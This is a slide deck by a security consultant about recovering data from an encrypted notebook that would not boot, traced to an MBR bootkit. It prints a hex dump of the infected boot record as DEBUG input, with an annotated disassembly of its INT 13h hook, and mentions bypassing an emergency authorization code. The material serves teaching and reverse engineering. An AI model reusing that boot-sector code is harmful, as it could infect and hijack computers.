The Case of the Non-bootable Notebook

DATA RESCUE IN A DIFFERENT

WAY
Question of the presentation

Having hacker talent is useful in working as

an IT security expert?
Sure. Youre getting three questions (Qnumber)
during this presentation and the guy who will
give me a perfect answer for all of them gain
a Belgian fruitbeer.
Please, answer them following my
presentation.
Case study: initialization
A company purchases some licences of a full disk
encryption software in order to provide data confidentiality
on VIP users computer.
Before whole deployment they make a pilot. An external IT
security consultant installs and configures the management
application, creates a silent client installer and installs it on
a VIP IT members notebook.
A few weeks later and after a reboot an error message
appears on the display of the notebook client is
not installed.
There is only a reboot button to click it and the VIP should
have to access some data in decrypted format...
IT security expert
IT security expert with basic
skills
learns/reads about cryptography,
understands symmetric encryption,
knows what AES mean,
can draw the conclusion that he needs to
have secret key to make a rescue successfully.
IT security expert with
product-specific knowledge
Knows theoretical background of the application:
e.g. data are stored in encrypted format on the hard disk,
decryption happens only in the random access memory
when an application accesses them.
Knows structure of the software: e.g. client installation
set can be build using the management application.
Configuration data and secret keys are stored in a central
database and a synchronization process sends them to a
client.
Installs and configures live systems: has experience in
deployment, knows pre-boot authentication process which
precedes loading of operating system.
IT security expert with product
operation experience
Knows what to do in case of usual problems. For
example:
user forgets his password recovery,
user locks his account recovery.
Knows what to do in case of unusual but known
problems. For example:
virus infection without communication to central
management and with forbidden Safe Mode boot support
decryption,
corrupted operating system decryption.
Has idea to solve unusual and undocumented problems.
For example:
data rescue from a hard disk that is partially encrypted but
stores corrupted encryption information careful
decryption,
boot process stops before pre-authentication decryption.
Initial attempts
Idea I: decryption

We can make backup decrypted data.

Product-specific theoretical knowledge: if a
client cannot boot from its hard disk, we need to
use the Emergency disk to remove encryption.
Product-specific practical knowledge : how we
can build an Emergency disk (two supported
solutions: boot from floppy with FreeDOS or
boot from CD with BartPE)
We used floppy boot plugging an USB floppy
drive in that case.
Authorization
After reboot an authorization process checks
whether you have permission to use emergency
functions. This process is very simple. A proprietary
algorithm generates a unique code which depends
on the current date. If you type proper code you will
use desired functionality.
Product-specific theoretical knowledge: if you
participate on the necessary course, you learn how
you should use these functions and you can get a
daily code for practices.
Product-specific practical knowledge : if you have an
arbitrary daily code with known date, you can spare
time since you dont need to request a current one,
just apply a simple hack.
Authentication

We must authenticate before accessing

encryption parameters.
Product-specific theoretical knowledge : there
are two different authentication methods
local (hard disk) authentication based on data
located in the hard disk,
central authentication based on configuration data
that is located in the central database.
Product-specific practical knowledge : we know
how we can save configuration data.
Local authentication attempt

Result: failed, we got similar error message

than the original one [... client is not
installed].
Central authentication
attempt
Step I: successful authentication using top admin
credentials to log on central management interface,
Step II: saving configuration data of the client
computer.
Problem I: local IT member noted down a wrong
password.
Problem II: external IT security consultant had no
notes but wrong tips.
Conclusion: None of the known methods were
useful.
Question: Is it the end?
Idea II: please, please, please
A blond gets on a bus in Budapest and asks the
bus driver: Will this bus take me to New York?
The bus driver shakes his head and says, Of
course, not.
Hearing this, the blond smiles and twitters:
Please, please, please!
Question to the manufacturer: Is there any other
(undocumented) way to decrypt data?
English-English translation: Is there any
vulnerability known by the manufacturer in
the application?
Result: failed but we got 2 days to find a solution.
Idea III: minimal chance

If encryption didnt execute... One of my

colleague connected the hard disk to a
notebook and booted from another disk.
Result: unexpected the antivirus application
found malware on Master Boot Record (MBR)
of connected hard disk.
Can you see the light at the end of the
tunnel?
IT security expert with reverse
engineering knowledge
Reverse engineering is one of the most
important hacking capabilities.
Reverse engineering is useful for anybody
who likes to understand the exact operation
of an application.
Reverse engineering may be prohibited by
software manufacturers but malicious codes
are rarely contain EULA to forbid it.
Master Boot Record
Role of Master Boot Record

MBR = code + partition table

In the boot process BIOS loads it to the memory
(at address 0000:7C00h) and gives the control to
it.
Since CPU operates in real mode in this phase,
machine code is executed based on 16-bit
registers instead of 32 bits.
Primary purpose of this code is loading Partition
Boot Record (PBR) of the active partition to the
memory and giving the control to it.
Windows MBR
Memory copy routine
0000:7C00 33C0 XOR AX,AX ; AX=0000
0000:7C02 8ED0 MOV SS,AX ; SS=0000
0000:7C04 BC007C MOV SP,7C00 ; SP=7C00
0000:7C07 FB STI
0000:7C08 50 PUSH AX
0000:7C09 07 POP ES ; ES=0000
0000:7C0A 50 PUSH AX
0000:7C0B 1F POP DS ; DS=0000
0000:7C0C FC CLD
0000:7C0D BE1B7C MOV SI,7C1B ; SI=7C1B
0000:7C10 BF1B06 MOV DI,061B ; DI=061B
0000:7C13 50 PUSH AX ; pushes 0000
0000:7C14 57 PUSH DI ; pushes 061B
0000:7C15 B9E501 MOV CX,01E5 ; CX=01E5
0000:7C18 F3 REPZ
0000:7C19 A4 MOVSB ; 0:[061B-07FF]=0:[7C1B-7DFF]
0000:7C1A CB RETF ; jumps to 0:061B
Active partition search
0000:061B BDBE07 MOV BP,07BE ; 07BE = start of partition table
0000:061E B104 MOV CL,04 ; 04 = number of partition entries
0000:0620 386E00 CMP [BP+00],CH ; first btye = partition status
0000:0623 7C09 JL 062E ; jumps if less 0 (0 = inactive,
; 80, 81 etc. = active)
0000:0625 7513 JNZ 063A ; jumps if not zero (= active)
0000:0627 83C510 ADD BP,+10 ; BP points to next entry
0000:062A E2F4 LOOP 0620 ; jumps to check next part. status
0000:062C CD18 INT 18 ; in case of 4 inactive parts:
; Press a key to reboot"
0000:062E 8BF5 MOV SI,BP ; SI points to current entry
0000:0630 83C610 ADD SI,+10 ; SI points to next entry
0000:0633 49 DEC CX ; CX--
0000:0634 7419 JZ 064F ; was it last partition entry?
0000:0636 382C CMP [SI],CH ; checks next partition status
0000:0638 74F6 JZ 0630
Error handling
0000:063A A0B507 MOV AL,[07B5]
0000:063D B407 MOV AH,07 ; AX points to Invalid partition
; table message
0000:063F 8BF0 MOV SI,AX ; SI=AX
0000:0641 AC LODSB ; AL contains next character of
; the error message
0000:0642 3C00 CMP AL,00
0000:0644 74FC JZ 0642 ; if AL contains terminator byte
; infinite loop
0000:0646 BB0700 MOV BX,0007
0000:0649 B40E MOV AH,0E
0000:064B CD10 INT 10 ; writes the character to the
; screen
0000:064D EBF2 JMP 0641 ; jumps to read a character
Location check
0000:064F 884E10 MOV [BP+10],CL
0000:0652 E84600 CALL 069B
...
0000:069B BF0500 MOV DI,0005 ; DI=0005
0000:069E 8A5600 MOV DL,[BP+00] ; DL=drive number
0000:06A1 B408 MOV AH,08
0000:06A3 CD13 INT 13 ; reads drive parameters
0000:06A5 7223 JB 06CA ; jumps on error
[Code calculates number of sectors on the partition based on CHS]
; result is in DX:AX
0000:06BE 39560A CMP [BP+0A],DX
0000:06C1 7723 JA 06E6 ; jumps if first sector
; position too big
0000:06C3 7205 JB 06CA
0000:06C5 394608 CMP [BP+08],AX
0000:06C8 731C JNB 06E6 ; jumps if first sector
; position too big
Calculation
; CHS means Cylinder-Head-Sector, old BIOS addressing mode which
; has a 8 GB address space limit
0000:06A7 8AC1 MOV AL,CL
0000:06A9 243F AND AL,3F ; AL=number of sectors per
track
0000:06AB 98 CBW
0000:06AC 8ADE MOV BL,DH ; BL=number of heads - 1
0000:06AE 8AFC MOV BH,AH ; BH=00
0000:06B0 43 INC BX ; BX=number of heads
0000:06B1 F7E3 MUL BX ; DX:AX=No of heads*No of
; sectors/cylinder
0000:06B3 8BD1 MOV DX,CX
0000:06B5 86D6 XCHG DL,DH
0000:06B7 B106 MOV CL,06
0000:06B9 D2EE SHR DH,CL
0000:06BB 42 INC DX ; DX=number of cylinders
0000:06BC F7E2 MUL DX ; DX:AX=No of total
; sectors
Reading active PBR without
LBA support
0000:06CA B80102 MOV AX,0201 ; AX=0201
0000:06CD BB007C MOV BX,7C00 ; BX=7C00
0000:06D0 8B4E02 MOV CX,[BP+02]
0000:06D3 8B5600 MOV DX,[BP+00]
0000:06D6 CD13 INT 13 ; reads 1st sector
0000:06D8 7351 JNB 072B ; jumps if no error
0000:06DA 4F DEC DI ; DI--
0000:06DB 744E JZ 072B
0000:06DD 32E4 XOR AH,AH ; AH=00
0000:06DF 8A5600 MOV DL,[BP+00]
0000:06E2 CD13 INT 13 ; resets drive
0000:06E4 EBE4 JMP 06CA ; try again!
...
0000:072B C3 RET
Reading active PBR with LBA support
0000:06E6 8A5600 MOV DL,[BP+00] 0000:070F 6A01 PUSH 01
0000:06E9 60 PUSHA 0000:0711 6A10 PUSH 10
0000:06EA BBAA55 MOV BX,55AA 0000:0713 B442 MOV AH,42
0000:06ED B441 MOV AH,41 0000:0715 8BF4 MOV SI,SP
0000:06EF CD13 INT 13 0000:0717 CD13 INT 13
0000:06F1 7236 JB 0729 0000:0719 61 POPA
0000:06F3 81FB55AA CMP BX,AA55 0000:071A 61 POPA
0000:06F7 7530 JNZ 0729 0000:071B 730E JNB 072B
0000:06F9 F6C101 TEST CL,01 0000:071D 4F DEC DI
0000:06FC 742B JZ 0729 0000:071E 740B JZ 072B
0000:06FE 61 POPA 0000:0720 32E4 XOR AH,AH
0000:06FF 60 PUSHA 0000:0722 8A5600 MOV DL,[BP+00]
0000:0700 6A00 PUSH 00 0000:0725 CD13 INT 13
0000:0702 6A00 PUSH 00 0000:0727 EBD6 JMP 06FF
0000:0704 FF760A PUSH [BP+0A] 0000:0729 61 POPA
0000:0707 FF7608 PUSH [BP+08] 0000:072A F9 STC
0000:070A 6A00 PUSH 00 0000:072B C3 RET
0000:070C 68007C PUSH 7C00
If read operation fails...
0000:0655 732A JNB 0681 ; jumps if PBR is OK
0000:0657 FE4610 INC BYTE PTR [BP+10] ; [BP+10]=01
0000:065A 807E040B CMP BYTE PTR [BP+04],0B
0000:065E 740B JZ 066B ; jumps if FAT32
0000:0660 807E040C CMP BYTE PTR [BP+04],0C
0000:0664 7405 JZ 066B ; jumps if FAT32 LBA
0000:0666 A0B607 MOV AL,[07B6] ; Error loading operating
; system
0000:0669 75D2 JNZ 063D Q1: Whats the purpose of this code?

0000:066B 80460206 ADD BYTE PTR [BP+02],06

0000:066F 83460806 ADD WORD PTR [BP+08],+06
0000:0673 83560A00 ADC WORD PTR [BP+0A],+00

0000:0677 E82100 CALL 069B ; try again!

0000:067A 7305 JNB 0681 ; jumps if PBR is OK
0000:067C A0B607 MOV AL,[07B6] ; Error loading operating
; system
0000:067F EBBC JMP 063D
PBR check and giving control
0000:0681 813EFE7D55AA CMP WORD PTR [7DFE],AA55
0000:0687 740B JZ 0694 ; jumps if magic number OK
0000:0689 807E1000 CMP BYTE PTR [BP+10],00
0000:068D 74C8 JZ 0657 ; jumps if first probe
0000:068F A0B707 MOV AL,[07B7] ; Missing operating
; system
0000:0692 EBA9 JMP 063D
0000:0694 8BFC MOV DI,SP ; DI=SP=7C00
0000:0696 1E PUSH DS ; pushes 0000
0000:0697 57 PUSH DI ; pushes 7C00
0000:0698 8BF5 MOV SI,BP ; SI=BP
0000:069A CB RETF ; jumps to PBR
Reverse engineering malware
My first meeting with a
computer virus
1994: I bought a hard disk and got an
additional test application which was infected
by Backform.2000.A (2000 is the length of
that viruscode).
When I realized the infection, I disassembled
the code, printed it using print screen
function then I took the computer back for
disinfection.
My first reverse engineering task executed
during 2 days.
Infected MBR
Q2: Which application can use the content below as input?
e 7c00 FA 33 DB 8E D3 36 89 26 FE 7B BC FE 7B 1E 66 60
e 7c10 FC 8E DB BE 13 04 83 2C 02 AD C1 E0 06 8E C0 BE
e 7c20 00 7C 33 FF B9 00 01 F3 A5 B8 02 02 B1 3D BA 80
e 7c30 00 8B DF CD 13 33 DB 90 90 90 90 66 8B 47 4C C7
e 7c40 47 4C 6A 00 66 26 A3 77 00 8C 47 4E 06 68 51 00
e 7c50 CB FB 8E C3 B8 01 02 B9 3F 00 BA 80 00 B7 7C CD
e 7c60 13 66 61 1F 5C EA 00 7C 00 00 9C 80 FC 42 74 0B
e 7c70 80 FC 02 74 06 9D EA 00 00 00 00 2E 88 26 94 00
e 7c80 9D 9C 2E FF 1E 77 00 0F 82 9E 00 9C FA 06 66 60
e 7c90 FC B4 00 B5 00 80 FD 42 75 04 AD AD C4 1C 85 C0
e 7ca0 75 01 40 8B C8 C1 E1 09 B0 8B 8B FB 60 F2 AE 75
e 7cb0 48 90 66 26 81 3D F0 85 F6 74 75 F1 26 81 7D 05
e 7cc0 80 3D 75 E9 26 8A 45 04 3C 21 74 04 3C 22 75 DD
e 7cd0 BE 0B 02 2E 80 3C 00 75 20 2E 88 04 26 C7 45 FF
e 7ce0 FF 15 66 8C C8 66 C1 E0 04 05 00 02 66 2E A3 FC
e 7cf0 01 2D 04 00 66 26 89 45 01 61 B0 83 F2 AE 75 25
e 7d00 66 26 81 3D C4 02 E9 00 75 F2 66 26 81 7D 04 00
e 7d10 E9 FD FF 75 E7 66 26 C7 45 FC 90 90 90 83 26 83
e 7d20 65 06 00 EB D7 66 61 07 9D CA 02 00
u 7c00 7d2b
q
Memory copy routine
0000:7C00 FA CLI
0000:7C01 33DB XOR BX,BX ; BX=0000
0000:7C03 8ED3 MOV SS,BX ; SS=0000
0000:7C05 36 SS:
0000:7C06 8926FE7B MOV [7BFE],SP
0000:7C0A BCFE7B MOV SP,7BFE ; SP=7BFE
0000:7C0D 1E PUSH DS
0000:7C0E 6660 PUSHAD
0000:7C10 FC CLD
0000:7C11 8EDB MOV DS,BX ; DS=0000
0000:7C13 BE1304 MOV SI,0413 ; SI=0413
0000:7C16 832C02 SUB WORD PTR [SI],+02 ; reduces RAMTOP with 2 KBs
0000:7C19 AD LODSW ; reads new RAMTOP
0000:7C1A C1E006 SHL AX,06 ; *2^6 = *2^10/2^4
; offset/16 = segment
0000:7C1D 8EC0 MOV ES,AX ; ES=segment address of new RAMTOP
0000:7C1F BE007C MOV SI,7C00 ; SI=7C00
0000:7C22 33FF XOR DI,DI ; DI=0000
0000:7C24 B90001 MOV CX,0100 ; CX=0100
0000:7C27 F3 REPZ
0000:7C28 A5 MOVSW ; copies 512 bytes to new RAMTOP
Reading additional sectors
0000:7C29 B80202 MOV AX,0202
0000:7C2C B13D MOV CL,3D
0000:7C2E BA8000 MOV DX,0080
0000:7C31 8BDF MOV BX,DI
0000:7C33 CD13 INT 13 ; reads 2 sectors following
; previous 512 bytes
Interrupt hooking
0000:7C35 33DB XOR BX,BX ; BX=0000
0000:7C37 90 NOP
0000:7C38 90 NOP
0000:7C39 90 NOP
0000:7C3A 90 NOP
0000:7C3B 668B474C MOV EAX,[BX+4C] ; orig addr of int 13h
0000:7C3F C7474C6A00 MOV WORD PTR [BX+4C],006A ; new offset
0000:7C44 6626A37700 MOV ES:[0077],EAX ; stores orig addr
0000:7C49 8C474E MOV [BX+4E],ES ; new segment address
0000:7C4C 06 PUSH ES
0000:7C4D 685100 PUSH 0051
0000:7C50 CB RETF ; jumps to RAMTOP:0051
Interesting load operation
9F80:0051 FB STI
9F80:0052 8EC3 MOV ES,BX ; ES=0000
9F80:0054 B80102 MOV AX,0201
9F80:0057 B93F00 MOV CX,003F
9F80:005A BA8000 MOV DX,0080
9F80:005D B77C MOV BH,7C
9F80:005F CD13 INT 13 ; reads 1 sector but what it
is?
9F80:0061 6661 POPAD
9F80:0063 1F POP DS
9F80:0064 5C POP SP
9F80:0065 EA007C0000 JMP 0000:7C00 ; gives control to a
memory position that contains previously loaded sector and the
address points to the typical location of MBR code in the
memory.

Q3: What did happen earlier (during client install and MBR
infection)?
Final solution

How could we solve the original problem? We

copied the content of sector 3Fh (63) to
sector 0 and rebooted the notebook.
Pter Gara-Tarnczi (CISSP, GCIH, GCFW)

THANK YOU FOR YOUR

INTEREST!